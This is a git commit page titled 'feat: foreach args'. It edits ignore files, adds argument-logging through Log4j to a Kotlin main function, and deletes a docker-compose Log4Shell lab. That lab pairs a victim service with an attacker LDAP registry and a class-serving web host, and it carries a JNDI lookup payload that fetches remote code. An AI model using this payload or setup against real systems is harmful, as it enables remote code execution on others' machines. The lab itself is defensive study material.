Browse Source

feat: foreach args

master
QuentinN42 7 months ago
parent
commit
8e1b014be0
Signed by: number42 GPG Key ID: 2CD7D563712B3A50
  1. 8
      .dockerignore
  2. 7
      .gitignore
  3. 66
      docker-compose.yml
  4. 7
      src/Main.kt

8
.dockerignore

@ -1,5 +1,7 @@
# Ignore Gradle build output
*.log
build/
# Ignore Gradle metadata
.gradle/
.git
.gitignore
.idea
.vscode

7
.gitignore

@ -1,8 +1,5 @@
# Log file
*.log
# Ignore any folders labeled build/
build/
# Ignore Gradle metadata
.gradle/
.idea
.vscode

66
docker-compose.yml

@ -1,66 +0,0 @@
version: "3"
services:
# The service on which to gain RCE
victim:
build:
context: ${PWD}/src/victim/
dockerfile: ${PWD}/docker/gradle-app.Dockerfile
args:
APP_NAME: "victim"
environment:
JAVA_OPTS: >-
-Dvictim-payload=$${jndi:ldap://attacker_ldap_registry:1389/cn=made-class,dc=ldap-registry,dc=attacker}
depends_on:
- attacker_ldap_registry
- attacker_ldap_registry_setup
- attacker_codebase
# The attacker hosts a server which the victim can use to look up the location
# of the code to execute. Specifically, the directory server will contain a
# `Reference` containing a factory class to use to construct an object. This
# factory class is executed on the victim, giving RCE.
#
# Many frameworks can be used for this, including RMI and CORBA. We just use
# an LDAP server.
attacker_ldap_registry:
image: "bitnami/openldap:2.5"
environment:
LDAP_PORT_NUMBER: "1389"
LDAP_ROOT: "dc=ldap-registry,dc=attacker"
LDAP_ADMIN_USERNAME: "admin"
LDAP_ADMIN_PASSWORD: "admin"
LDAP_USERS: "nobody"
LDAP_PASSWORDS: "nobody"
LDAP_GROUP: "users"
LDAP_EXTRA_SCHEMAS: "cosine,inetorgperson,nis,java,corba"
LDAP_ALLOW_ANON_BINDING: "yes"
ports:
- "1389:1389"
# The LDAP registry must be initialized with data. The `Reference` must be
# placed into the directory. This could easily be done with an LDIF file on
# bootstrap, but we write a Kotlin program to do that for us.
attacker_ldap_registry_setup:
build:
context: ${PWD}/src/attacker_ldap_registry_setup/
dockerfile: ${PWD}/docker/gradle-app.Dockerfile
args:
APP_NAME: "attacker_ldap_registry_setup"
environment:
JAVA_OPTS: >-
-Dattacker-ldap-registry-url=ldap://attacker_ldap_registry:1389/dc=ldap-registry,dc=attacker
-Dattacker-codebase-url=http://attacker_codebase:80/
depends_on:
- attacker_ldap_registry
# The victim needs to know the classes of the objects the attacker feeds it.
# In Java parlance, the victim needs to know the "codebase" of the attacker.
# We set that up here. This HTTP server will host the `.class` files needed by
# the victim for remote code execution.
attacker_codebase:
build:
context: ${PWD}/src/attacker_codebase
dockerfile: ${PWD}/docker/gradle-java-codebase.Dockerfile
ports:
- "8080:80"

7
src/Main.kt

@ -5,6 +5,11 @@ import org.apache.logging.log4j.LogManager
// Get the logger to use for output
val logger: Logger = LogManager.getLogger()
fun work(input: String)
{
logger.info("Working on {}", input)
}
fun main(args: Array<String>) {
logger.info("args : {}", args)
args.forEach{work(it)}
}

Loading…
Cancel
Save